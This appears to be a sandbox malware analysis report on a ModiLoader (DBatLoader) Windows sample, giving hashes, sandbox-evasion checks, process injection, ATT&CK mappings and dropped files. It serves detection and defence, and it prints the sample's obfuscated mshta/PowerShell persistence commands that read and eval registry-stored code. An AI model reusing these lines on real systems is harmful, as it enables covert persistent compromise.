modiloader | 34aca71a998e63a9d667689182ed87a380e4a61587faae601da678938d0c8b1c

General

Target

a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
Size

265KB
MD5

a767ce43a2b5f7f48fd355f0e24d43d1
SHA1

c022c5cfbe330b2bf8a984625e05c191b13e0645
SHA256

34aca71a998e63a9d667689182ed87a380e4a61587faae601da678938d0c8b1c
SHA512

53d1a07e994f06d4ba1fc5cbc24fd9ff7b5588e90fe4329ed68666c045196f527ad60d5b37899500f63e4380e7d28bfe887b9fcd4e24313c6cd99aa35f5b8e91
SSDEEP

6144:AAZ4m1VLp8UBoCcp2XvUU+NK4JSaXhAzRTkaUHgq:AHmXo9XbJSaXmzRXUAq

Score

10^/10

modiloader evasion persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2672 2536 mshta.exe
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
evasion

File and Directory Discovery
T1083

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	2536	mshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

description	ioc	process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

ModiLoader Second Stage 60 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1728-3-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-7-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-8-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-9-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-13-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-12-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-11-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-10-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-14-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/1728-15-0x0000000001DF0000-0x0000000001EC4000-memory.dmp	modiloader_stage2
behavioral1/memory/2628-24-0x0000000006290000-0x0000000006364000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-28-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-26-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-35-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-33-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-52-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-51-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-50-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-49-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-48-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-47-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-46-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-45-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-44-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-43-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-42-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-41-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-40-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-39-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-38-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-37-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-36-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-34-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-32-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-31-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-30-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2628-29-0x0000000006290000-0x0000000006364000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-62-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-69-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2628-27-0x0000000002EE0000-0x0000000004EE0000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-61-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-60-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-59-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-58-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2692-57-0x00000000001C0000-0x00000000002FE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-71-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-84-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-83-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-82-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-81-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-80-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-79-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-78-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-77-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-76-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-75-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-74-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-73-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-72-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2208-70-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Deletes itself 1 IoCs

Processes:

regsvr32.exe

pid process

2692 regsvr32.exe
Drops startup file 1 IoCs

Processes:

regsvr32.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\daaa61.lnk regsvr32.exe

pid	process
2692	regsvr32.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\daaa61.lnk	regsvr32.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\66a1e6\\730ec6.lnk\""	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Ogv6iWP2W=\"1\";E58N=new%20ActiveXObject(\"WScript.Shell\");VfMA3tMu=\"ZA\";M5Ok7y=E58N.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\kyveu\\\\vnzu\");HN3gWfX=\"A\";eval(M5Ok7y);cqInSdv6A3=\"mQfV\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Ug0TVIwqP6=\"GpuIbHAg\";U41d=new%20ActiveXObject(\"WScript.Shell\");cVCR5Cm=\"W\";Dsa3g=U41d.RegRead(\"HKCU\\\\software\\\\kyveu\\\\vnzu\");ygPNkx4Hd=\"XP0nu\";eval(Dsa3g);KP5Uz8dmqg=\"m\";"	regsvr32.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 1096 set thread context of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 2628 set thread context of 2692	2628	powershell.exe	regsvr32.exe
PID 2692 set thread context of 2208	2692	regsvr32.exe	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\International	regsvr32.exe

Modifies registry class 7 IoCs

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\455c80\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\455c80\shell\open\command\ = "mshta \"javascript:wUmHRX9L=\"YP3SxL\";r4c=new ActiveXObject(\"WScript.Shell\");djQw6id=\"PTypvi0\";EWUd49=r4c.RegRead(\"HKCU\\\\software\\\\kyveu\\\\vnzu\");d0g3yOjE=\"Y\";eval(EWUd49);oIm9cyJaW7=\"Hui\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.54ebcef	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.54ebcef\ = "455c80"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\455c80	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\455c80\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\455c80\shell\open	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeregsvr32.exe

pid	process
2628	powershell.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe
2692	regsvr32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exeregsvr32.exe

pid process

2628 powershell.exe
2692 regsvr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2628 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe

pid process

1096 a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe

description	pid	process
Token: SeDebugPrivilege	2628	powershell.exe

pid	process
1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exemshta.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 1096 wrote to memory of 1728	1096	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe	a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
PID 2672 wrote to memory of 2628	2672	mshta.exe	powershell.exe
PID 2672 wrote to memory of 2628	2672	mshta.exe	powershell.exe
PID 2672 wrote to memory of 2628	2672	mshta.exe	powershell.exe
PID 2672 wrote to memory of 2628	2672	mshta.exe	powershell.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2628 wrote to memory of 2692	2628	powershell.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe
PID 2692 wrote to memory of 2208	2692	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1096

C:\Users\Admin\AppData\Local\Temp\a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a767ce43a2b5f7f48fd355f0e24d43d1_JaffaCakes118.exe"
2⤵
PID:1728

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:rczm94kN="u";Kp7=new%20ActiveXObject("WScript.Shell");ep36Eehw="NdH6qp";lB5V4Q=Kp7.RegRead("HKLM\\software\\Wow6432Node\\aThXocDV7\\MvgVwMLnN");gE7IJTca3="JGU";eval(lB5V4Q);C3Urwq8fBH="FN";
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:iygjhsc
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe
3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\SysWOW64\regsvr32.exe"
4⤵
PID:2208

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Virtualization/Sandbox Evasion

3

T1497

Modify Registry

2

T1112

Credential Access

Discovery

Software Discovery

1

T1518

Query Registry

4

T1012

Virtualization/Sandbox Evasion

3

T1497

File and Directory Discovery

1

T1083

System Information Discovery

3

T1082

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\66a1e6\730ec6.lnk
Filesize
881B

MD5
25931e2579dc6ab3d57a280a75882e6a

SHA1
77458626f8bf9f8a6d524b25b218e85562f15b49

SHA256
0d8d862a6c0c144a548b627a5c896098b9ee816eb57fd59da7c224fff74ffd56

SHA512
f3dc325390389972ab9b22096860c9355a30ddd46a1778b5255faed3b9c28230f1e67cb71743ad5edb7ca8b97c2828092c6a56b70006b5f5461f73d10312b32c

Download Submit
C:\Users\Admin\AppData\Local\66a1e6\9d0e99.bat
Filesize
61B

MD5
fee145988b03ddac71ed154b5117d9d3

SHA1
bbea418c35343ee6a01526675e95121d22b24f0d

SHA256
36fa6dfa6667111610585bdab4680341e6e4193ee612e3cca3272811007c6524

SHA512
3e5300e89ccf0d73f4ec9746801e72ac58823d53fb5979105d804c4152525492fcb8540e9905289258e41009b7ddf2aa3707dcc40b52511c4cd24eab428ddef2

Download Submit
C:\Users\Admin\AppData\Local\66a1e6\a56505.54ebcef
Filesize
19KB

MD5
27dbe1018cf66ca6afa91aa74e694b2d

SHA1
182b5e3b67de745cade31332cbd1b387ddd8f12b

SHA256
45b90dcba4980cceeec9a50cdb356040d9f51975fa1ce9b33cb7db6f15bfc553

SHA512
366b22ed33106e1712849568e03d43d58c440121e89fb1ed7a794399c2a71b7f61466a8944c651479e977fae4e889f2b0d048af2006fa040f228067301fe61a3

Download Submit
C:\Users\Admin\AppData\Roaming\849415\7ed68e.54ebcef
Filesize
5KB

MD5
aaad8890ebc9616f04949720f02694f2

SHA1
4d9ee6c8daec5837c2b5804f2bc5427a6bc53c5f

SHA256
fca96230bc3c883343675681544ad10e09b7b507b546d32147c416bc9a21f0d8

SHA512
c7b0d9c9b199fd5f5fc532cffed50c4dada9d82da62b6911cdce50f52e8ce610c9752eb764498915ad07b1deb530bd2e1ec45d2f9643ba3430c87a816d0d593e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\daaa61.lnk
Filesize
991B

MD5
0eae4b7109bbef8cebc3acf4af10f761

SHA1
17fefea75eca31b7e9df0a4ee6ab4f7a4608592f

SHA256
61cf9319c2dba9a5fcb551af7c1ab09b5f63e8e605ecc9fcf9c01465ddea4b81

SHA512
77815a067c4a1ca88779e9bee3c8cf0f0f771371d53630b6db3b5d7175be25efab246e830e963eb99101706768eac2e2e3d3dfd2514d2d5c8939288bda1d48ac

Download Submit
memory/1728-3-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/1728-7-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/1728-10-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-14-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-15-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-11-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-12-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-13-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-9-0x0000000001DF0000-0x0000000001EC4000-memory.dmp

Filesize
848KB

Download
memory/1728-8-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2208-72-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-78-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-70-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-71-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-73-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-74-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-75-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-76-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-77-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-84-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-79-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-80-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-81-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-82-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2208-83-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2628-29-0x0000000006290000-0x0000000006364000-memory.dmp

Filesize
848KB

Download
memory/2628-24-0x0000000006290000-0x0000000006364000-memory.dmp

Filesize
848KB

Download
memory/2628-27-0x0000000002EE0000-0x0000000004EE0000-memory.dmp

Filesize
32.0MB

Download
memory/2692-51-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-31-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-30-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-32-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-62-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-69-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-34-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-61-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-60-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-59-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-58-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-57-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-36-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-37-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-38-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-39-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-40-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-41-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-42-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-43-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
memory/2692-44-0x00000000001C0000-0x00000000002FE000-memory.dmp

Filesize
1.2MB

Download
